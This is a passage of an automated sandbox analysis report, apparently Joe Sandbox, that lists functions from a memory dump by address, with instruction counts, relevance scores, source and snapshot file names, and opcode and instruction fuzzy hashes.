                                                • Instruction Fuzzy Hash: 24A1DF74E00218CFDB14DFA9C894ADDBBB2FF49304F1491A9D409AB364DB70AA89CF55
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 012A4037 Relevance: .2, Instructions: 186COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.572319473.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_12a0000_12057ad2.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 7a17a16d013a93c3f91dbf150ebc2c3312485abc9aff1cd6e6ab9b1f8d77384f
                                                • Instruction ID: 17059929fce2b7c5e25aabab4949a57c22e486b1deb7e8a5bbd48eb098e1e86b
                                                • Opcode Fuzzy Hash: 7a17a16d013a93c3f91dbf150ebc2c3312485abc9aff1cd6e6ab9b1f8d77384f
                                                • Instruction Fuzzy Hash: C8216D709593C69FC706DF78C9582ADBFB0AF16301F0845EAC485EB292E6784E45CB62
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 012A5520 Relevance: .1, Instructions: 134COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.572319473.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_12a0000_12057ad2.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 917876e31e99c742e0a1a1e353f51ad67eb93ab0ac558afc803d1a2c9885973c
                                                • Instruction ID: 22016606bbe18d7f9e71f48437e1c4c17b09b9b746167d560fd6040bbb066e6a
                                                • Opcode Fuzzy Hash: 917876e31e99c742e0a1a1e353f51ad67eb93ab0ac558afc803d1a2c9885973c
                                                • Instruction Fuzzy Hash: F7511A70A0121A8FCB18EFB4D4919EEB7B2FF8A308F148969D405AB350DB35AC45CF95
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 012A6070 Relevance: .1, Instructions: 125COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.572319473.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_12a0000_12057ad2.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: be4d1d92d650a35f1d81f014e1f1f8143cd759d8c82a039b32f6f0ddda3e40e2
                                                • Instruction ID: 91e91e867f33f156b025da0bc3a7f1fb45e50069c85069d366b2d232fdfdf131
                                                • Opcode Fuzzy Hash: be4d1d92d650a35f1d81f014e1f1f8143cd759d8c82a039b32f6f0ddda3e40e2
                                                • Instruction Fuzzy Hash: 0441D374E112189FCB18DFAAD9849DDFBB2BF89310F589129D805A7358DB30A885CF54
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 012A4633 Relevance: .1, Instructions: 115COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.572319473.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_12a0000_12057ad2.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 10bae9732d137a9390e5128a1c8323744473f9c56c8c45bca004b4c72237318d
                                                • Instruction ID: 909001e4548ce439b0d3d6537cca265285dc9a97787cb60cc7eaeb4455593075
                                                • Opcode Fuzzy Hash: 10bae9732d137a9390e5128a1c8323744473f9c56c8c45bca004b4c72237318d
                                                • Instruction Fuzzy Hash: B651B374A0021CCFDB64EFA4D894B9DBBB2FB88304F1084A9D949A7355DB35AD85CF50
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 012A5127 Relevance: .1, Instructions: 112COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.572319473.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_12a0000_12057ad2.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 997efcfdbac56074b1170489689237105b29eba77522abdac153b8d72cfa769a
                                                • Instruction ID: 1f3b6d700600a6eda989671a8a3b92c713deb966597489a37aff2ed682021d7f
                                                • Opcode Fuzzy Hash: 997efcfdbac56074b1170489689237105b29eba77522abdac153b8d72cfa769a
                                                • Instruction Fuzzy Hash: 9D51E774E01208DFCB55DFA8E4A0A9DBBB2FF89304F208569C404A3354EB35A946CF65
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 012A5138 Relevance: .1, Instructions: 108COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.572319473.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_12a0000_12057ad2.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: c13ae46956876ae6f013b2414d2a1244c035b5399b497e219c170783ecb20747
                                                • Instruction ID: 08aaa247f943bbdc1e7aedd36fa7ef9ecdb290cca0bc4467ca0463437070097b
                                                • Opcode Fuzzy Hash: c13ae46956876ae6f013b2414d2a1244c035b5399b497e219c170783ecb20747
                                                • Instruction Fuzzy Hash: 6141A674E01208DFCB54DFA8E590ADEBBB2FF89304F208569D414A3354EB35A946CF65
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 012A5B52 Relevance: .1, Instructions: 100COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.572319473.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_12a0000_12057ad2.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: f4d5ded08f21b32e0c6b8f148d47cd16d5080c1c3d61b5321f6e966dec9a2e62
                                                • Instruction ID: fd62f20e175f09d00ebb1eeb1d2e98139febf0b392dd700ac3de0f3d81322713
                                                • Opcode Fuzzy Hash: f4d5ded08f21b32e0c6b8f148d47cd16d5080c1c3d61b5321f6e966dec9a2e62
                                                • Instruction Fuzzy Hash: DB411074911218EFCB18DFA4E990AEDBBB2BF8A304F14552AE801BB364DB356845CF11
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 012A5B60 Relevance: .1, Instructions: 96COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.572319473.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_12a0000_12057ad2.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 128d15d58d7c1e87000e5df34744a8249f0f035cf92691910f6f91d5770fea79
                                                • Instruction ID: 00adc8beb18a6753dcbf4cb138c845b2f74c5d10890fce532bb7b5794f28c765
                                                • Opcode Fuzzy Hash: 128d15d58d7c1e87000e5df34744a8249f0f035cf92691910f6f91d5770fea79
                                                • Instruction Fuzzy Hash: 4B41F074911218EFCB18EFA4E4949DEBBB2BF8A304F105529E801BB354EB356845CF51
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 012A5A0C Relevance: .1, Instructions: 87COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.572319473.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_12a0000_12057ad2.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: cd75d058696bb08d75db82ec971314a5ef80db1c2453d20889ceda87e0aa42da
                                                • Instruction ID: fca907f3c003225c3229792a209d57010fb188d075b18522f8acf6e2dc009031
                                                • Opcode Fuzzy Hash: cd75d058696bb08d75db82ec971314a5ef80db1c2453d20889ceda87e0aa42da
                                                • Instruction Fuzzy Hash: 0F313670D002489FDF24CFA9C580ADEBFF1AF48354F64842AE909AB351DB359945CFA0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 012A43B9 Relevance: .1, Instructions: 86COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.572319473.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_12a0000_12057ad2.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 611d5189b246b40e3910e20e529115b14ae42f64725543c4ac9f4cabac22f149
                                                • Instruction ID: 46cf1690efc367e2385c761ac751019a4dd7d1911064246a7470cdc266f0876e
                                                • Opcode Fuzzy Hash: 611d5189b246b40e3910e20e529115b14ae42f64725543c4ac9f4cabac22f149
                                                • Instruction Fuzzy Hash: 2931F2B0D012089FDB18DFA5E990AEEBBB2FF88304F148529D801A7354DB399906CF65
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 012A58B8 Relevance: .1, Instructions: 84COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.572319473.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_12a0000_12057ad2.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 355dc8e37f4d4d740b43960a82130fc6c76e34a7bd10149295aafcc7688905a2
                                                • Instruction ID: 49e844fd2a19b4b9f437b59ec48df38a2846e940a4f2f1e1094e2c3f81f63dd8
                                                • Opcode Fuzzy Hash: 355dc8e37f4d4d740b43960a82130fc6c76e34a7bd10149295aafcc7688905a2
                                                • Instruction Fuzzy Hash: 9A313270D01209DFDB58DFA9D9846DEBBB2FF8A304F148429D005BB250EB359942CF61
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 012A4530 Relevance: .1, Instructions: 83COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.572319473.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_12a0000_12057ad2.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 0231b32b869fd5befa1ca06d58fb1f6047d8adac97fd34e470acc1856259ba1e
                                                • Instruction ID: 6de6166b593d6c6a5c24e3ce8b3022ac4643270b4486efd8098bb61ed54ab12a
                                                • Opcode Fuzzy Hash: 0231b32b869fd5befa1ca06d58fb1f6047d8adac97fd34e470acc1856259ba1e
                                                • Instruction Fuzzy Hash: 68311474D00258CFDB18EFAAD844A9EFBB2BF89304F50C52AC804AB718EB705906CF51
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 012A5A18 Relevance: .1, Instructions: 83COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.572319473.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_12a0000_12057ad2.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: f0effdd5f796a2b3f204428b677e156b7fa4bd14cd318e8e381e2d230200a224
                                                • Instruction ID: 25496c0088618348ae368303828670487ea1b186623914783cc6514689e17d2b
                                                • Opcode Fuzzy Hash: f0effdd5f796a2b3f204428b677e156b7fa4bd14cd318e8e381e2d230200a224
                                                • Instruction Fuzzy Hash: 503104B0D002489FDF24CFA9C584ADEBFF5AF48354F648429E909AB354DB749945CFA0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 012A43C8 Relevance: .1, Instructions: 81COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.572319473.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_12a0000_12057ad2.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: f02a2233d55cb8afa6ad71bc8ffb7f63c6286785f1eff9bb818df9f3f88e20ee
                                                • Instruction ID: 8d2e8f2522b35f79a26c94fd1333b26e6e3f0ab531f77d759df33afa11d2de52
                                                • Opcode Fuzzy Hash: f02a2233d55cb8afa6ad71bc8ffb7f63c6286785f1eff9bb818df9f3f88e20ee
                                                • Instruction Fuzzy Hash: FF31D1B4D012089FDB14EFA5E994AEEBBF2FF88304F148529D801A7354DB359906CF65
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 012A53B9 Relevance: .1, Instructions: 80COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.572319473.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_12a0000_12057ad2.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 838eb4d51eb4cf33fdf56cd6f1d23dd62ff161303fa97fef6f3b47d293f1da8f
                                                • Instruction ID: d2c966bd27a664da29afb4a432d6dae371ca6c7e736062d5bcb3388d1933b621
                                                • Opcode Fuzzy Hash: 838eb4d51eb4cf33fdf56cd6f1d23dd62ff161303fa97fef6f3b47d293f1da8f
                                                • Instruction Fuzzy Hash: DC313670E11219DFDB18DFA9D984A9EBBF2FF88300F149529E504AB354EB349841CF65
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 012A53C8 Relevance: .1, Instructions: 76COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.572319473.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_12a0000_12057ad2.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 0678d64fa543dd4fd81402bdd657d94f7988715dac2560fb72a22d49a5e00f7c
                                                • Instruction ID: ddd62d7686b2fa04363714adcac23beb1ca63e878fa8d2a1a57301b44d208034
                                                • Opcode Fuzzy Hash: 0678d64fa543dd4fd81402bdd657d94f7988715dac2560fb72a22d49a5e00f7c
                                                • Instruction Fuzzy Hash: AB312770E11219DFDB18DFA9D984A9EBBF2FF88301F149129E504AB354EB349841CF65
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 012A4521 Relevance: .1, Instructions: 76COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.572319473.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_12a0000_12057ad2.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 3516dd5f32985daab09aeedccd239fd1df4be7b03d330020cdfbd27ebeff01fb
                                                • Instruction ID: 093a6898fd5e60ceea64989e6d6a95364c7257789e0056fafde222be095742f6
                                                • Opcode Fuzzy Hash: 3516dd5f32985daab09aeedccd239fd1df4be7b03d330020cdfbd27ebeff01fb
                                                • Instruction Fuzzy Hash: 5B216970D10648CFDB18DFA6D84569EFBB2FF8A304F44C52AC805AB218DB749506CF51
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 012A58C8 Relevance: .1, Instructions: 75COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.572319473.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_12a0000_12057ad2.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: f16dae67ba59cc1847144dd23e408544c598eae53d541ca0c5b61c10e151d592
                                                • Instruction ID: ad4a117e083b23734ecd9958423e85e2577e2d7ac6369c02315a88a954a88a22
                                                • Opcode Fuzzy Hash: f16dae67ba59cc1847144dd23e408544c598eae53d541ca0c5b61c10e151d592
                                                • Instruction Fuzzy Hash: 75311F70D01208DFDB18DFAAD940A9EBBB2BF89304F108429D405BB360EB355942CF61
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 012A605F Relevance: .1, Instructions: 73COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.572319473.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_12a0000_12057ad2.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: c9b8155f203e8e27ebdc5525b92b6f222a22b429cac915841e26ed16e25d475b
                                                • Instruction ID: 396564348fa938fa62463793e33f64e4145f438611e269010b08cfa55c66aeec
                                                • Opcode Fuzzy Hash: c9b8155f203e8e27ebdc5525b92b6f222a22b429cac915841e26ed16e25d475b
                                                • Instruction Fuzzy Hash: C221E375E256189BDB08CFAAD9805DDFBB3BFC9310F18D12AD808A7315DB3068468B40
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 012A42B0 Relevance: .1, Instructions: 72COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.572319473.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_12a0000_12057ad2.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 22e97e51beb004451c95523df53b7c131a9b0944e8eb83b9807ed3e4de70e958
                                                • Instruction ID: dbc27dc815458791bbebe3165914cfa65451cdfe0cf6c15fe21e66a4560a0309
                                                • Opcode Fuzzy Hash: 22e97e51beb004451c95523df53b7c131a9b0944e8eb83b9807ed3e4de70e958
                                                • Instruction Fuzzy Hash: 662125B0D412089FCB48DFA9E9819EEBBB2EF89304F14812AD409B7354DB385906CF55
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 012A6028 Relevance: .1, Instructions: 67COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.572319473.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_12a0000_12057ad2.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: d356f203d57aac8d913202347f07a624aec70b290f45febd659daaede5b620ff
                                                • Instruction ID: c1fd914ceb0745bf76dba4041e0bd7479f452bd51f6f1d3425425b92e01a4001
                                                • Opcode Fuzzy Hash: d356f203d57aac8d913202347f07a624aec70b290f45febd659daaede5b620ff
                                                • Instruction Fuzzy Hash: F121F4B5E652089FCB18CFAAE9805EDFBF6BF89310F18D16AD808A7215D73069458F40
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 012A42C0 Relevance: .1, Instructions: 64COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.572319473.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_12a0000_12057ad2.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 2b585056a1694b4d1e3099e2eaaf2fd558687bfc6025c52321111d8d65212cb2
                                                • Instruction ID: 4ca06c140bbca23ca8bbf6ec3f5c457edc124fe8f59ba81b01a11ad8619ea171
                                                • Opcode Fuzzy Hash: 2b585056a1694b4d1e3099e2eaaf2fd558687bfc6025c52321111d8d65212cb2
                                                • Instruction Fuzzy Hash: F0210470D0120C9FCB44DFA9E4909EEBBB2AF88304F10912AD408B7354DB385906CF55
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 012A0438 Relevance: .1, Instructions: 62COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.572319473.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_12a0000_12057ad2.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 11f068154d9774a435926a026e62d9c9c88ed1fd6c902a895f4ce1febdaeaa34
                                                • Instruction ID: 11ea8ee4c5f77a857629b8cafb559e65cfaca961eac27011d004cb6f9cf2c6fc
                                                • Opcode Fuzzy Hash: 11f068154d9774a435926a026e62d9c9c88ed1fd6c902a895f4ce1febdaeaa34
                                                • Instruction Fuzzy Hash: 5721337494424B9FC744FFA8E9D4BDE7771FB80308F454929C2019B264EB706A498BD1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 012A0448 Relevance: .1, Instructions: 59COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.572319473.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_12a0000_12057ad2.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: e962707e16cfa351fa3c7b7a71ec149f77b0243f5e2c315d87814899d083d251
                                                • Instruction ID: fecf4a0d05b7564a4c15a584f9be32cd0077da422584d1cd716f0b888945540e
                                                • Opcode Fuzzy Hash: e962707e16cfa351fa3c7b7a71ec149f77b0243f5e2c315d87814899d083d251
                                                • Instruction Fuzzy Hash: F0212174A4420B9FCB54FFA9E4D4ADE7771FB40308F414929D20197268EB707D498BD1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 012A4170 Relevance: .1, Instructions: 58COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.572319473.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_12a0000_12057ad2.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: bcd54ec678efa01ad7fe4158be4f1076405a1a8a7d1985f860e7b93460ed2776
                                                • Instruction ID: 5489f411f23f876fa8475225b3f0d999b0688df8739a102e47af8ac02770ca34
                                                • Opcode Fuzzy Hash: bcd54ec678efa01ad7fe4158be4f1076405a1a8a7d1985f860e7b93460ed2776
                                                • Instruction Fuzzy Hash: 99114970D152868FCB14EFB4E89C2BEFBB0FB4A302F005959810AA3284EB744940CB91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 012A65A2 Relevance: .1, Instructions: 53COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.572319473.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_12a0000_12057ad2.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: f0566e2794e67410fe9454c3b551843be5f4e6b16feed29e11859214c605b71d
                                                • Instruction ID: 4ed01843201b00c29b99fe85965a7c0ab808c2b0dea32189641fffac5ed78270
                                                • Opcode Fuzzy Hash: f0566e2794e67410fe9454c3b551843be5f4e6b16feed29e11859214c605b71d
                                                • Instruction Fuzzy Hash: 1221D374A51208CFDBA4DF64E898E99BBB1FF0A305F109199D409A7364DB30AD84CF00
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 012A4842 Relevance: .0, Instructions: 47COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.572319473.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_12a0000_12057ad2.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 398afd2268f97e3338710a23dad9db3bc6e37d876a0fc29fddee0b4148baa9b5
                                                • Instruction ID: 8fc391a43cb7a84694dae3a430a0ed7d1069026a1bfbb9653374cbc7170674b7
                                                • Opcode Fuzzy Hash: 398afd2268f97e3338710a23dad9db3bc6e37d876a0fc29fddee0b4148baa9b5
                                                • Instruction Fuzzy Hash: A0017C70D09288DFCB15EFA4E9547ADBFB0FB0A300F1885EAC854A7366D3744A45CB51
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 012A5D41 Relevance: .0, Instructions: 44COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.572319473.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_12a0000_12057ad2.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 6135f948a90f536ecc589d7f87b1caef99534cd5d678f2e8403c8c73c5399c8c
                                                • Instruction ID: 21bb6f545cb4c74a484dda5897284e6a5317671f6dd5fb1b91d80a04dc094fe0
                                                • Opcode Fuzzy Hash: 6135f948a90f536ecc589d7f87b1caef99534cd5d678f2e8403c8c73c5399c8c
                                                • Instruction Fuzzy Hash: B611C87095428A9FC705FF68E4E09DDBBB1FF40208F544AA9C4449B229F7316E4ACB91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 012A0540 Relevance: .0, Instructions: 43COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.572319473.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_12a0000_12057ad2.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: a7eee312d43cb670e93701105df5eaa32a55afbd280678e2d4d4ed323edef9dd
                                                • Instruction ID: 7a456a68975c5f1bc087d5041cf8d023fea48aafcfe92357348cc5c1dbb5cac3
                                                • Opcode Fuzzy Hash: a7eee312d43cb670e93701105df5eaa32a55afbd280678e2d4d4ed323edef9dd
                                                • Instruction Fuzzy Hash: 3C11FA74904209DFCB40EFA8D5809DEFBB1FB45304F148AAAD454A7225D730AE45DF81
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 012A5851 Relevance: .0, Instructions: 41COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.572319473.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_12a0000_12057ad2.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 763ac0b778f59b645aa7ba1f57f19e9ba219a88a0b7074a0552747eea205803b
                                                • Instruction ID: 65f497ea5303dda2858a6fafde1c62cca70c14b9d1604dabe8d8e068934e3597
                                                • Opcode Fuzzy Hash: 763ac0b778f59b645aa7ba1f57f19e9ba219a88a0b7074a0552747eea205803b
                                                • Instruction Fuzzy Hash: 1E019A34685204DFC304CB68D688CA9BBB0FF4A315B2581D9E549AB372CB35AD40DA00
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 012A4229 Relevance: .0, Instructions: 40COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.572319473.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_12a0000_12057ad2.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 3e0dbccc368b592d941314f51cd2d432a2ae160cab97ea5402e2d534ad1ae21a
                                                • Instruction ID: db0a9766d026d8b385beeb5ab097c184e126480820f3dace4b3929e453b58871
                                                • Opcode Fuzzy Hash: 3e0dbccc368b592d941314f51cd2d432a2ae160cab97ea5402e2d534ad1ae21a
                                                • Instruction Fuzzy Hash: 99018BB0C94348EFEB10EFA4D4583EDBBB4EB06315F0480AAC50197281D3BC4A89CF51
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 012A0550 Relevance: .0, Instructions: 39COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.572319473.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: false
